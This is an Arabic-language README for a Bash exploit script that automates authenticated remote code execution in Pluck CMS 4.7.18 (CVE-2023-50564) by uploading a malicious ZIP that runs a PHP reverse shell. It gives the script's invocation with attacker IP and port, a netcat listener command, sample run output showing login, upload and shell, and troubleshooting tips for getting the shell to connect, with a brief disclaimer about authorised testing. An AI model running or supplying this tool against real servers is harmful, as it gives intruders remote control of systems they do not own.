
استغلال Bash لأتمتة تنفيذ التعليمات البرمجية عن بُعد المصادق عليه في Pluck CMS 4.7.18 عبر تحميل ZIP خبيث، مما يؤدي إلى تشغيل قشرة PHP عكسية لـ CVE-2023-50564.
يستغل هذا السكريبت ثغرة تنفيذ الأوامر عن بعد (RCE) في Pluck CMS v4.7.18. تسمح الثغرة لمستخدم خبيث برفع ملف PHP ضار إلى الخادم وتنفيذه، مما يمنحه تحكماً عن بعد في الجهاز الهدف.
يقوم السكريبت بأتمتة العملية بأكملها من خلال:
ملاحظة: يتطلب السكريبت وجود مستمع Netcat على جهاز المهاجم لاستقبال الـ reverse shell.
قبل تشغيل السكريبت، تأكد مما يلي:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host>: المضيف الهدف (مثال: greenhorn.htb).-P <password>: كلمة المرور للوحة تحكم Pluck CMS (مثال: abcd123).-i <IP>: عنوان IP الخاص بالمهاجم لاستقبال الـ reverse shell.-p <port>: المنفذ الذي يعمل عليه مستمع Netcat لالتقاط الـ reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
إعداد مستمع Netcat: على جهاز المهاجم، ابدأ مستمع Netcat على المنفذ المحدد:
nc -nvlp <port>
على سبيل المثال:
nc -nvlp 9001
تشغيل السكريبت: قدم الوسائط المطلوبة للسكريبت، بما في ذلك المضيف، كلمة المرور، عنوان IP، والمنفذ.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
تنفيذ السكريبت:
love.php)."RCE is waiting for you, please go take a look."، وسينتهي السكريبت بعد تتبع الوقت المستغرق.الوصول إلى الهدف: بمجرد تشغيل الـ reverse shell، سيظهر الاتصال في مستمع Netcat الخاص بك، مما يمنحك وصولاً عن بعد إلى الجهاز الهدف.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
يمكنك تثبيت curl و netcat باستخدام الأوامر التالية إذا لم يكونا مثبتين:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
هذا السكريبت مخصص لأغراض تعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به لهذا السكريبت غير قانوني وغير أخلاقي. احصل دائمًا على التصريح المناسب قبل استغلال أي ثغرة على نظام ما.
خطأ 504 Gateway Time-out: قد يواجه السكريبت هذا الخطأ عند محاولة تنفيذ الـ reverse shell، لكنه لا يؤثر على نجاح تنفيذ الصدفة. يحدث الخطأ عادةً بسبب استغراق الخادم الهدف وقتًا طويلاً للرد على طلب HTTP، لكن الصدفة يجب أن تظل تعمل.
مشاكل مستمع Netcat: إذا لم تستقبل الـ reverse shell، تأكد من أن عنوان IP والمنفذ مضبوطان بشكل صحيح، وأنه لا توجد قيود جدار حماية تمنع الهدف من الاتصال بجهازك.
فشل السكريبت في تسجيل الدخول: إذا فشل تسجيل الدخول إلى لوحة تحكم CMS، تحقق من كلمة المرور المقدمة وتأكد من أن النظام متاح على الجهاز الهدف.
أخبرني إذا كنت ترغب في أي تخصيص إضافي أو توضيح في ملف README!